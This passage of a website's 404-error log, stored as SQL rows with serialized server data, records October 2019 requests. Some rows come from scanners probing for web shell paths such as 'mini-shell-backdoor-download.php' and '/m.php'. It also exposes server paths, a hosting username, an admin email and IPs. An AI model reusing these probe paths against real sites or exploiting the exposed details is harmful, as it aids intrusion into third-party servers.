+http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZMxt4bUhCibXajp1P6X3QAAAEg\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.134\";s:11:\"REMOTE_PORT\";s:5:\"15402\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZMxt4bUhCibXajp1P6X3QAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569927607.455\";s:12:\"REQUEST_TIME\";s:10:\"1569927607\";}}','notice','2019-10-01 11:00:10','2019-10-01 11:00:08',34069288,35870744,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'157.55.39.134'),(27400,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/m.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"195-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"195-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"195-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/m.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/m.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZMt15HiT4fRdgjqkdPXmwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/m.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/m.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZMt15HiT4fRdgjqkdPXmwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"69.16.254.65\";s:11:\"REMOTE_PORT\";s:5:\"56164\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/m.php\";s:10:\"SCRIPT_URL\";s:6:\"/m.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZMt15HiT4fRdgjqkdPXmwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569926615.9632\";s:12:\"REQUEST_TIME\";s:10:\"1569926615\";}}','notice','2019-10-01 10:43:37','2019-10-01 10:43:36',35162016,36957176,'https://bintara.com.my/m.php',1,0,'69.16.254.65'),(27589,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-31/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-31/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpKdFZYXq7JUIqbrPgC1wAAAYE\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-31/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.88\";s:11:\"REMOTE_PORT\";s:4:\"8228\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-31/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpKdFZYXq7JUIqbrPgC1wAAAYE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570392692.2772\";s:12:\"REQUEST_TIME\";s:10:\"1570392692\";}}','notice','2019-10-06 20:11:35','2019-10-06 20:11:32',34362080,36164144,'https://bintara.com.my/toughbook-31/',1,0,'207.46.13.88'),(27590,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:68:\"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.136.178\";s:11:\"REMOTE_PORT\";s:5:\"63646\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpQDFZYXq7JUIqbrPgFYAAAAYU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570394124.1186\";s:12:\"REQUEST_TIME\";s:10:\"1570394124\";}}','notice','2019-10-06 20:35:27','2019-10-06 20:35:24',35416920,37225520,'https://bintara.com.my/?page_id=18',1,0,'108.161.136.178'),(27591,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpmlU1o81Ms4j7YQaMV0wAAAAY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpmlU1o81Ms4j7YQaMV0wAAAAY\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpmlU1o81Ms4j7YQaMV0wAAAAY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"95.216.20.23\";s:11:\"REMOTE_PORT\";s:5:\"36036\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:10:\"SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpmlU1o81Ms4j7YQaMV0wAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570399893.5417\";s:12:\"REQUEST_TIME\";s:10:\"1570399893\";}}','notice','2019-10-06 22:11:36','2019-10-06 22:11:33',35433760,37239520,'https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php',1,0,'95.216.20.23'),(27592,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpmllZYXq7JUIqbrPgRPgAAAYU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpmllZYXq7JUIqbrPgRPgAAAYU\";s:19:\"REDIRECT_SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpmllZYXq7JUIqbrPgRPgAAAYU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"95.216.20.23\";s:11:\"REMOTE_PORT\";s:5:\"36166\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:64:\"https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php\";s:10:\"SCRIPT_URL\";s:42:\"/rtf557lt/mini-shell-backdoor-download.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpmllZYXq7JUIqbrPgRPgAAAYU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570399895.0346\";s:12:\"REQUEST_TIME\";s:10:\"1570399895\";}}','notice','2019-10-06 22:11:36','2019-10-06 22:11:35',35039840,36838560,'https://bintara.com.my/rtf557lt/mini-shell-backdoor-download.php',1,0,'95.216.20.23'),(27588,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"119.15.90.75\";s:11:\"REMOTE_PORT\";s:5:\"46763\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpJsoMFLk21hQvqQVupngAAAdU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570392498.903\";s:12:\"REQUEST_TIME\";s:10:\"1570392498\";}}','notice','2019-10-06 20:08:24','2019-10-06 20:08:19',35512376,37321464,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'119.15.90.75'),(27587,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3452.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"23.229.34.228\";s:11:\"REMOTE_PORT\";s:4:\"4462\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZo0xFZYXq7JUIqbrPj3TQAAAZc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570387140.8394\";s:12:\"REQUEST_TIME\";s:10:\"1570387140\";}}','notice','2019-10-06 18:39:03','2019-10-06 18:39:01',35507704,37323704,'https://bintara.com.my/?page_id=18',1,0,'23.229.34.228'),(27586,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/blog/portfolio/broadbase/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 